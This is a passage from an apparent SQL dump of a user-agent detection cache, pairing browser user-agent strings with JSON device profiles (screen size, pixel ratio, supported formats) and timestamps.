(compatible; msie 9.0; windows xx 6.3; trident/5.0)','',1722514344),('mozilla/5.0 (compatible; msie 9.0; windows xx 6.0; wow64 trident/5.0)','',1722534781),('mozilla/5.0 (windows; windows xx 10.0; wow64) applewebkit/537.20 (khtml, like gecko) chrome/47.0 safari/535.0 edge/17.81151','',1722648884),('mozilla/5.0 (linux; android 7.0; pixel c build/nme91e) applewebkit/536.35 (khtml, like gecko) chrome/48.0 mobile safari/536.9','',1722648884),('mozilla/5.0 (ipad; cpu ipad xx 8_3_4 like mac xx x) applewebkit/600.20 (khtml, like gecko) chrome/47.0 mobile safari/601.8','',1722839016),('Mozilla/5.0 (Linux; Android 11; RMX1851) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1732416992),('mozilla/5.0 (compatible; msie 8.0; windows xx 6.3; x64; xx trident/4.0)','',1722849366),('mozilla/5.0 (u; linux x86_64) applewebkit/537.25 (khtml, like gecko) chrome/49.0 safari/602','',1722938965),('mozilla/5.0 (compatible; msie 10.0; windows; windows xx 6.1; win64; x64 trident/6.0)','',1722950246),('mozilla/5.0 (windows; windows xx 6.3) gecko/* firefox/50.7','',1723102076),('mozilla/5.0 (compatible; msie 9.0; windows xx 6.2; win64; x64; xx trident/5.0)','',1723115010),('mozilla/5.0 (iphone; cpu iphone xx 8_6_2; like mac xx x) applewebkit/602.40 (khtml, like gecko) chrome/51.0 mobile safari/537.7','',1723237021),('mozilla/5.0 (ipod; cpu ipod xx 11_0_1; like mac xx x) applewebkit/600.38 (khtml, like gecko) chrome/54.0 mobile safari/603.9','',1723270856),('mozilla/5.0 (linux; android 4.4; e:number:20-23:13 build/24.0) applewebkit/534.18 (khtml, like gecko) chrome/52.0 mobile safari/533.0','',1723293453),('mozilla/5.0 (compatible; msie 10.0; windows; windows xx 10.3; x64 trident/6.0)','',1723304428),('mozilla/5.0 (windows; windows xx 6.0) gecko/* firefox/69.3','',1723304903),('mozilla/5.0 (iphone; cpu iphone xx 8_8_7; like mac xx x) applewebkit/600.3 (khtml, like gecko) chrome/49.0 mobile safari/534.3','',1723414293),('Mozilla/5.0 (Macintosh Intel Mac OS X 10_11_5) AppleWebKit/* (KHTML, like Gecko) Safari/*','',1723438348),('mozilla/5.0 (u; linux i574) gecko/* firefox/53.2','',1723447433),('mozilla/5.0 (iphone; cpu iphone xx 9_2_8; like mac xx x) applewebkit/601.46 (khtml, like gecko) chrome/47.0 mobile safari/602.4','',1723447604),('mozilla/5.0 (android; android 4.3; xx compaq 2310b build/jss15j) applewebkit/536.5 (khtml, like gecko) chrome/54.0 mobile safari/536.0','',1723458729),('Mozilla/5.0 (Debian; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1741809837),('Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1741082007),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A145R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1724148624),('Mozilla/5.0 (Android; Android 7.*; LG-H920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1724172500),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_5_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1724184191),('Mozilla/5.0 (U; Linux i661) Gecko/* Firefox/*','',1724184569),('Mozilla/5.0 (iPad; CPU iPad OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727536259),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_6_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1724254684),('Mozilla/5.0 (Linux; Android 6.*; HTC One_M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1724345973),('Mozilla/5.0 (Linux; Linux i681 x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1724417828),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_3_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1724475631),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-S711B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1724652723),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725079240),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725177954),('Mozilla/5.0 (Linux; Android 10; EVE-LX9N; HMSCore 6.14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725179455),('Mozilla/5.0 X11; Ubuntu; Linux x86_64; rv:126.0 Gecko/* Firefox/*','',1747165963),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_9_3; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727536614),('Mozilla/5.0 (Linux; Linux i680 x86_64) Gecko/* Firefox/*','',1725371368),('Mozilla/5.0 (Linux; Android 6.*; Nexus 5P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730250969),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_6_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1725372193),('Mozilla/5.0 (U; Linux i642) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1725372331),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1725372395),('Mozilla/5.0 (Linux; Android 6.*; SM-G93508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725394674),('Mozilla/5.0 (WindowsCE 6.0) Gecko/* Firefox/*','',1725433027),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_7_5; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1725443221),('Mozilla/5.0 (MeeGo; NokiaN950-00) AppleWebKit/* (KHTML, like Gecko) NokiaBrowser/* Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725671406),('ELinks (0.4pre5; Linux 2.6 i686; 80x33)','',1725671479),('Mozilla/5.0 (Linux; Android 12; LM-K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725692598),('Mozilla/5.0 (Android 14; Mobile; LG-M255) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725783813),('Mozilla/5.0 (Linux; Android 12; DCO-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1725800937),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_7_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1725848392),('Mozilla/5.0 (Linux; Linux i640) Gecko/* Firefox/*','',1725872838),('Mozilla/5.0 (Linux; Android 14; SM-G990B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746950267),('Mozilla/5.0 (Linux; Android 11; MVK-T2101) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1726670812),('SonyEricssonT650i Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":170,\"screenHeight\":200,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1726744264),('Mozilla/5.0 (U; Linux i584) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1726795461),('Mozilla/5.0 (iPhone; CPU iPhone OS 18 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748589227),('Mozilla/5.0 (Linux; Android 11; BV8800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1726827269),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_4_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1726906127),('Mozilla/5.0 (Linux; Android 14; SM-S918B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727010641),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A556B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1740827343),('Mozilla/5.0 (Linux i671) Gecko/* Firefox/*','',1727532588),('Mozilla/5.0 (Linux; Android 7.*; Nexus 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727536147),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_6_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727536210),('Mozilla/5.0 (Android; Android 4.*; IQ4503 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727536542),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G9350F-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727536650),('Mozilla/5.0 (U; Linux i576 x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1727536858),('Mozilla/5.0 (Linux; Android 7.*; Nexus 7P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730140160),('Mozilla/5.0 (Linux; Linux i644 x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1727537139),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_1_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727537238),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_8_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539277),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_3; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727540136),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539478),('Mozilla/5.0 (Linux i542) Gecko/* Firefox/*','',1730252742),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_6_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539760),('Mozilla/5.0 (iPod; CPU iPod OS 10_7_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539787),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_7_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539822),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727539986),('Mozilla/5.0 (U; Linux i570) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1727540075),('Mozilla/5.0 (U; Linux i645 x86_64) Gecko/* Firefox/*','',1727540140),('Mozilla/5.0 (Linux; Android 4.*; LG Optimus G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730249371),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_2_4; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727542429),('Mozilla/5.0 (SMART-TV; Linux; Tizen 4.0) AppleWebKit/* (KHTML, like Gecko) Chrome TV Safari/*','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1920,\"screenHeight\":1080,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727629783),('Mozilla/5.0 (Linux; Android 9; PMT4991_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1727948276),('Mozilla/5.0 (Linux; Android 14; SM-A356B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746094564),('Mozilla/4.074482891 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0','',1728953474),('Mozilla/5.0 (Linux; Android 10; HUAWEI P30 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1743744685),('Mozilla/5.0 (Linux; Android 14; SM-S921B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1739109066),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-T255t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1729601359),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1729719966),('Mozilla/5.0 (iPod; CPU iPod OS 10_9_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1729795184),('Mozilla/5.0 (iPod; CPU iPod OS 11_1_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1729812959),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1729927815),('Mozilla/5.0 (Linux; Linux i674) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1730138877),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_9_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730139558),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_4; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730139807),('Mozilla/5.0 (Linux; Linux i565) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1730139999),('Mozilla/5.0 (Linux i673) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1730140021),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_9_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730140106),('Mozilla/5.0 (Linux; Android 4.*; Lenovo P786) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730140163),('Mozilla/5.0 (Linux; Android 4.*; LG-V310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730140394),('Mozilla/5.0 (iPod; CPU iPod OS 9_0_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730140433),('Mozilla/5.0 (Linux; Android 5.*; LG-D715) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730140640),('Mozilla/5.0 (Android; Android 5.*; SM-N915G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730140820),('Mozilla/5.0 (Linux; Linux i571) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1730140875),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730140968),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_1_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141150),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_5_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141953),('Mozilla/5.0 (iPod; CPU iPod OS 9_4_3; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141617),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_9_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141855),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_6_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141906),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_8_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141968),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730142035),('Mozilla/5.0 (Android; Android 4.*; SAMSUNG SM-T533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730248590),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730249823),('Mozilla/5.0 (Linux; Linux i671 x86_64) Gecko/* Firefox/*','',1730250069),('Mozilla/5.0 (Linux; Linux i552 x86_64) Gecko/* Firefox/*','',1730250291),('Mozilla/5.0 (Linux; Android 7.*; Xperia) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730251183),('Mozilla/5.0 (Linux; Android 5.*; LG-D720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730251631),('Mozilla/5.0 (Android; Android 4.*; Nexus 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730251830),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_4_7; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730251911),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730252389),('Mozilla/5.0 (iPad; CPU iPad OS 8 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730252641),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_7_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730277928),('Mozilla/5.0 (Linux; Android 14; Pixel 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1730830736),('Mozilla/5.0 (Linux; Android 14; 23030RAC7Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":876,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1731477911),('Mozilla/5.0 AppleWebKit/* (KHTML, like Gecko); compatible','',1737607624),('Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip320; Smartphone; 176x220)','',1731958586),('Mozilla/5.0 (Linux; Android 5.*; SM-T670) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1732341554),('Mozilla/5.0 (iPhone; CPU iPhone OS 18 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":736,\"pixelRatio\":2.608,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748025679),('l9tcpid/v1.1','',1748585569),('Mozilla/5.0(WindowsNT10.0;Win64;x64) AppleWebKit/*(KHTML,likeGecko)Chrome/86.0/537.36','',1748502193),('Mozilla/5.0 (Linux; Android 14; 23117RA68G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1733573726),('Mozilla/5.0 (Linux; Android 11; 9296G_EEA) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1733772173),('Mozilla/5.0 (Kubuntu; Linux x86_64) Gecko/* Firefox/*','',1740253695),('Mozilla/5.0 (CentOS; Linux x86_64) Gecko/* Firefox/*','',1734211515),('Mozilla/5.0 (Linux; Android 13; 23028RN4DG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1735079723),('Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1746270343),('Mozilla/5.0 (Linux; Android 13; SM-N980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1734467554),('Mozilla/5.0 (Android 15; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1742670339),('Mozilla/5.0 (Ubuntu; Linux x86_64) Gecko/* Firefox/*','',1747434735),('BlackBerry9530/4.7 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1735043751),('Mozilla/5.0 DelfiLVwww/618.0 EmbeddedBrowser (iPhone; CPU iPhone OS 18 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: DDA473D5-8258-4408-9E7D-81D030D27287 VendorUID: A9504978-F267-4B01-966A-7359E1BB8AAC 